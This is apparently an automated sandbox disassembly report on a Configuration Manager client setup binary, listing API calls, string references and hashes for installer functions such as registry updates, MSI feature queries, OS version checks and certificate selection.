                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$,/l$CSetupEnvironment::IsExcludedFromUpgrade$Client is in the upgrade exclusion collection. Stop proceeding.$Client is not installed yet. Ignore all upgrade exclusion flags.$Client is stamped with /alwaysexcludeupgrade. Stop proceeding.$GetClientUpgradeTattoo(bExcluded)$IsExcludedFromUpgradeFromPolicy(bExcluded)$setupenv.cpp$setupenv.cpp$setupenv.cpp$setupenv.cpp$0l
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005BC29B
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BC31A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BC389
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread$CloseH_prolog3
                                                                                          • String ID: #$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$AlwaysExcludeUpgrade$Software\Microsoft\CCMSetup$UpdateClientUpgradeTattoo$Updated registry value %s to %d$\Ym$regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_Ccmsetup, ulAccess)$regKey.SetDword(c_szRegValue_UpgradeTattoo, bExcluded ? 1 : 0)$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0060403F
                                                                                          • FileTimeToLocalFileTime.KERNEL32(00000000,?,CCM::Utility::Time::Time,00000048,005B6D8B,?,000000FF,?,?,?,?,?,?,?,?,?), ref: 00604074
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0060407E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006040B3
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006040EC
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006040F6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060412B
                                                                                          • __CxxThrowException@8.LIBCMT ref: 006041A2
                                                                                          Strings
                                                                                          • ..\Time.cpp, xrefs: 00604137
                                                                                          • FileTimeToSystemTime(&localTime, &sysTime), xrefs: 00604121
                                                                                          • ..\Time.cpp, xrefs: 0060411B
                                                                                          • CCM::Utility::Time::Time, xrefs: 00604050
                                                                                          • ..\Time.cpp, xrefs: 006040BF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006040AE
                                                                                          • ..\Time.cpp, xrefs: 006040A3
                                                                                          • FileTimeToLocalFileTime(&fileTime, &localTime), xrefs: 006040A9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00604126
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Time$File$CurrentErrorLastThread$Exception@8H_prolog3_catch_LocalSystemThrow
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\Time.cpp$..\Time.cpp$..\Time.cpp$..\Time.cpp$CCM::Utility::Time::Time$FileTimeToLocalFileTime(&fileTime, &localTime)$FileTimeToSystemTime(&localTime, &sysTime)
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005EF385
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005EF3D3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005EF449
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005EF493
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\utils.cpp$..\utils.cpp$..\utils.cpp$..\utils.cpp$..\utils.cpp$..\utils.cpp$0 != hRequest$CCMHttpGetResponseStatus(hRequest, &dwStatusCode, sStatusText)$CheckResponseStatus$dwStatusCode>=200 && dwStatusCode<=299
                                                                                          • API String ID: 3454896115-2804189796
                                                                                          • Opcode ID: 9755bbbe3ac901de96961ff36efa3fdb637e2688005a97c79d4bbc4532126b95
                                                                                          • Instruction ID: a3656f99f0557f48651dfc345f919a9d096298d32dba595f08c2b5910ba1fb17
                                                                                          • Opcode Fuzzy Hash: 9755bbbe3ac901de96961ff36efa3fdb637e2688005a97c79d4bbc4532126b95
                                                                                          • Instruction Fuzzy Hash: E121F9B16C0385FADB21AFA98C5AFEF3E24BF85B20F144115F5406B2C2CB784941C791
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005AD336
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AD418
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AD594
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005AD58F
                                                                                          • GetPackageFeatures, xrefs: 005AD397
                                                                                          • msiutil.cpp, xrefs: 005AD59C
                                                                                          • MsiViewExecute failed with error %d for package %s, xrefs: 005AD507
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005AD413
                                                                                          • msiutil.cpp, xrefs: 005AD584
                                                                                          • Find features '%s' from msi database %s, xrefs: 005AD685
                                                                                          • msiutil.cpp, xrefs: 005AD408
                                                                                          • MsiRecordGetStringW( shRecord, 1, szBuffer, &dwBufSize), xrefs: 005AD58A
                                                                                          • SELECT `Feature`.`Feature` FROM `Feature`, xrefs: 005AD45B
                                                                                          • MsiOpenDatabaseW( sPackagePath.c_str(), (LPCTSTR)0, &shDatabase), xrefs: 005AD40E
                                                                                          • MsiDatabaseOpenView failed with error %d for package %s, xrefs: 005AD4A0
                                                                                          • msiutil.cpp, xrefs: 005AD420
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$Find features '%s' from msi database %s$GetPackageFeatures$MsiDatabaseOpenView failed with error %d for package %s$MsiOpenDatabaseW( sPackagePath.c_str(), (LPCTSTR)0, &shDatabase)$MsiRecordGetStringW( shRecord, 1, szBuffer, &dwBufSize)$MsiViewExecute failed with error %d for package %s$SELECT `Feature`.`Feature` FROM `Feature`$msiutil.cpp$msiutil.cpp$msiutil.cpp$msiutil.cpp
                                                                                          • API String ID: 229633481-271249321
                                                                                          • Opcode ID: bb80774888d215cf7aab4180d21941f1453866bf6f3d9da136fc6f97fd977e6e
                                                                                          • Instruction ID: 3ff9f0e952e9b4d76d497be108df0418a7c08fc087ea8a18e4311a998f16eefa
                                                                                          • Opcode Fuzzy Hash: bb80774888d215cf7aab4180d21941f1453866bf6f3d9da136fc6f97fd977e6e
                                                                                          • Instruction Fuzzy Hash: 1AA17C70801668EADF21EB65CD49BEEBFB9BF46304F0400E9E449A7292D7745E84CF61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005B9308
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005F8FF1: __EH_prolog3_catch_GS.LIBCMT ref: 005F8FF8
                                                                                            • Part of subcall function 005F8FF1: GetCurrentThreadId.KERNEL32 ref: 005F906D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B9382
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B93FD
                                                                                          Strings
                                                                                          • util.cpp, xrefs: 005B9409
                                                                                          • util.cpp, xrefs: 005B938E
                                                                                          • LastOSVersion, xrefs: 005B9410
                                                                                          • util.cpp, xrefs: 005B93ED
                                                                                          • SOFTWARE\Microsoft\CCM, xrefs: 005B93C1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B937D
                                                                                          • util.cpp, xrefs: 005B9372
                                                                                          • OS version (%s) is not chagned., xrefs: 005B94CE
                                                                                          • shKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_CcmRoot, ulAccess), xrefs: 005B93F3
                                                                                          • IsOSVersionChanged, xrefs: 005B9337
                                                                                          • CcmGetOSMajorMinorVersion(sNewOSVersion), xrefs: 005B9378
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B93F8
                                                                                          • Detected OS version is changed from '%s' to '%s', xrefs: 005B9493
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_$Close
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmGetOSMajorMinorVersion(sNewOSVersion)$Detected OS version is changed from '%s' to '%s'$IsOSVersionChanged$LastOSVersion$OS version (%s) is not chagned.$SOFTWARE\Microsoft\CCM$shKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_CcmRoot, ulAccess)$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 3158008245-1682988320
                                                                                          • Opcode ID: 44aeae1fed12c78413e719b7776f02d787d55ea4a16043f3132cbe498a13bc40
                                                                                          • Instruction ID: 82b0d7de8741ac148b6515f10a262616c800975d6ecff0c610c2ff261a11be15
                                                                                          • Opcode Fuzzy Hash: 44aeae1fed12c78413e719b7776f02d787d55ea4a16043f3132cbe498a13bc40
                                                                                          • Instruction Fuzzy Hash: 1B51D170901349EADF10EBA4C94ABEDBFB5BF50304F244059F605772C2C7B46A49CB61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005A41A2
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00576835: __EH_prolog3.LIBCMT ref: 0057683C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A425D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A4321
                                                                                          Strings
                                                                                          • manifest.cpp, xrefs: 005A4265
                                                                                          • Failed getting XML node for file: %s. Error 0x%x, xrefs: 005A4289
                                                                                          • Item[@FileName='%s'], xrefs: 005A41FF
                                                                                          • Discovering whether item '%s' exists., xrefs: 005A42D3
                                                                                          • manifest.cpp, xrefs: 005A424D
                                                                                          • H&l, xrefs: 005A41D4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A4258
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A431C
                                                                                          • DetectItem(spNode, bInstalled, bNeedsRepair), xrefs: 005A4317
                                                                                          • m_spManifest.selectNode(sQuery.c_str(), &spNode), xrefs: 005A4253
                                                                                          • manifest.cpp, xrefs: 005A4311
                                                                                          • CcmSetupManifest::DetectItem, xrefs: 005A41E3
                                                                                          • manifest.cpp, xrefs: 005A4329
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3Thread$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmSetupManifest::DetectItem$DetectItem(spNode, bInstalled, bNeedsRepair)$Discovering whether item '%s' exists.$Failed getting XML node for file: %s. Error 0x%x$H&l$Item[@FileName='%s']$m_spManifest.selectNode(sQuery.c_str(), &spNode)$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp
                                                                                          • API String ID: 1940058678-3707825056
                                                                                          • Opcode ID: 0ca0977a6b2fb67cb89e65fbf030f2a29f05e0e8983cdc727168df86327bac95
                                                                                          • Instruction ID: c3227158d8276c8d285690f97d83f6d8b274d4762cedf9188f3fa4fe3c9ac00c
                                                                                          • Opcode Fuzzy Hash: 0ca0977a6b2fb67cb89e65fbf030f2a29f05e0e8983cdc727168df86327bac95
                                                                                          • Instruction Fuzzy Hash: 2B514A71D41249AEDF11DBE4C94ABEEBFB5EF95704F144009F50477282CBB45A05CBA1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006140FF
                                                                                            • Part of subcall function 005787DA: CloseHandle.KERNEL32 ref: 005787E6
                                                                                          • GetCurrentThread.KERNEL32 ref: 00614138
                                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0057F21B,CcmSetup::DetermineInstallSource,000000CC), ref: 0061413F
                                                                                          • GetLastError.KERNEL32(?,?,?,?,0057F21B,CcmSetup::DetermineInstallSource,000000CC), ref: 00614149
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061417F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006141DF
                                                                                          • CloseHandle.KERNEL32(00000000,00000008,?,?,?,?,?,0057F21B,CcmSetup::DetermineInstallSource,000000CC), ref: 00614234
                                                                                          Strings
                                                                                          • ..\usertoken.cpp, xrefs: 00614187
                                                                                          • CCM::Utility::Security::GetSidStringFromCurrentThread, xrefs: 00614110
                                                                                          • OpenThreadToken(GetCurrentThread(), (0x0008) , 1, &shThread), xrefs: 00614175
                                                                                          • ..\usertoken.cpp, xrefs: 006141E7
                                                                                          • GetSIDFromToken(shThread, sUserSid), xrefs: 006141D5
                                                                                          • ..\usertoken.cpp, xrefs: 006141CF
                                                                                          • ..\usertoken.cpp, xrefs: 0061416F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061417A
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006141DA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$Current$CloseHandle$ErrorH_prolog3_catchLastOpenToken
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$CCM::Utility::Security::GetSidStringFromCurrentThread$GetSIDFromToken(shThread, sUserSid)$OpenThreadToken(GetCurrentThread(), (0x0008) , 1, &shThread)
                                                                                          • API String ID: 1773849950-3290042507
                                                                                          • Opcode ID: 22338353d68a3fafd774f7467acd288ab16607d2796200b12616478260c4f4e9
                                                                                          • Instruction ID: 552e0f84b185d51edc8b6bdcdcf34505ff0837ae0893c08a2a1c2d1186fb33fb
                                                                                          • Opcode Fuzzy Hash: 22338353d68a3fafd774f7467acd288ab16607d2796200b12616478260c4f4e9
                                                                                          • Instruction Fuzzy Hash: B031E4B0D80356EADF51ABB48C0EBFE7E76AF55740F188059F505B7281CA790681C7A2
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006750D8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00675122
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0067517C
                                                                                          • CoTaskMemFree.OLE32(00000001,CcmUtilLib::CcmFreeIPAddressInformation,00000010,006754F0,00000000,?,?,?,?,?,?,?,?,SMSSITECODE,CcmSetup::AppendAutoUpgradeInfo,000000E8), ref: 0067519D
                                                                                          • CoTaskMemFree.OLE32(00000000,?,?,?,?,?,SMSSITECODE,CcmSetup::AppendAutoUpgradeInfo,000000E8), ref: 006751AA
                                                                                          • CoTaskMemFree.OLE32(?,?,?,?,?,?,SMSSITECODE,CcmSetup::AppendAutoUpgradeInfo,000000E8), ref: 006751B7
                                                                                          • CoTaskMemFree.OLE32(?,CcmUtilLib::CcmFreeIPAddressInformation,00000010,006754F0,00000000,?,?,?,?,?,?,?,?,SMSSITECODE,CcmSetup::AppendAutoUpgradeInfo,000000E8), ref: 006751C4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeTask$CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$0 != dwLen$0 != pInfo$CcmUtilLib::CcmFreeIPAddressInformation
                                                                                          • API String ID: 2738139261-3844193030
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0058B143
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00587752: __EH_prolog3.LIBCMT ref: 00587759
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058B471
                                                                                          • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0058B49E
                                                                                          • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0058B1D1
                                                                                            • Part of subcall function 005781EA: CertFreeCertificateContext.CRYPT32 ref: 005781F9
                                                                                          Strings
                                                                                          • GetSSLCertificateContext failed with error 0x%x, xrefs: 0058B507
                                                                                          • Locate client certificate bypassing Certificate Issuers restriction, xrefs: 0058B415
                                                                                          • Last cert queries failed. Will retry after %u seconds., xrefs: 0058B27D
                                                                                          • SSLCertificateContext: CertStore=%s, CertIssuers=%s, CertificateSelectionCriteria=%s, FirstCertificateSelection=%d, PKICertOptions, xrefs: 0058B394
                                                                                          • CcmSetup::GetSSLCertificateContext, xrefs: 0058B17D
                                                                                          • ccmsetup.cpp, xrefs: 0058B461
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058B46C
                                                                                          • ccmsetup.cpp, xrefs: 0058B47D
                                                                                          • t&k, xrefs: 0058B268
                                                                                          • CcmGetCertificateContextEx2( sStoreName, sCertIssuers, sCertSel, (BOOL)dwCertFirstFlag, dwCertFlags, &g_pClientCertContext ), xrefs: 0058B467
                                                                                          • 42k, xrefs: 0058B407
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CertCertificateContext$DuplicateH_prolog3$CurrentFreeH_prolog3_catch_Thread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$42k$CcmGetCertificateContextEx2( sStoreName, sCertIssuers, sCertSel, (BOOL)dwCertFirstFlag, dwCertFlags, &g_pClientCertContext )$CcmSetup::GetSSLCertificateContext$GetSSLCertificateContext failed with error 0x%x$Last cert queries failed. Will retry after %u seconds.$Locate client certificate bypassing Certificate Issuers restriction$SSLCertificateContext: CertStore=%s, CertIssuers=%s, CertificateSelectionCriteria=%s, FirstCertificateSelection=%d, PKICertOptions$ccmsetup.cpp$ccmsetup.cpp$t&k
                                                                                          • API String ID: 3654290402-3873082328
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00654325
                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 00654384
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000001D,00000000,00000000), ref: 006543B7
                                                                                          • inet_addr.WS2_32(?), ref: 006543DF
                                                                                          • GetNameInfoW.WS2_32(?,00000010,?,00000401,00000000,00000000,00000004), ref: 00654406
                                                                                          • WSAGetLastError.WS2_32 ref: 00654410
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00654449
                                                                                          • WSACleanup.WS2_32 ref: 006545AA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharCleanupCurrentErrorH_prolog3_catch_InfoLastMultiNameStartupThreadWideinet_addr
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\lswins.cpp$..\lswins.cpp$0 == iFailed$CCM::LocationServices::LSResolveAddressToName$IP %ls resolved to %ls$Resolved name %ls is not FQDN
                                                                                          • API String ID: 3604615128-2881486682
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00580439
                                                                                            • Part of subcall function 005A162C: __EH_prolog3_GS.LIBCMT ref: 005A1633
                                                                                            • Part of subcall function 005A162C: lstrcmpiW.KERNEL32(?,CCMHTTPPORT,00000001,00000000,?,?,00000001,?), ref: 005A176B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00580301
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_lstrcmpi
                                                                                          • String ID: "$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$&$($AADCLIENTAPPID$AADRESOURCEURI$CCM::LocationServices::CcmGetCMGMetaData( sSiteCode.c_str(), sCMGMP, arrCMGMPs, sTRK)$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$g_pSetupEnv->UpdateExecEnv()
                                                                                          • API String ID: 436525598-4159668841
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0057C254
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057C300
                                                                                            • Part of subcall function 005F6BC9: __EH_prolog3_catch.LIBCMT ref: 005F6BD0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057C3A0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CurrentThread$CloseH_prolog3
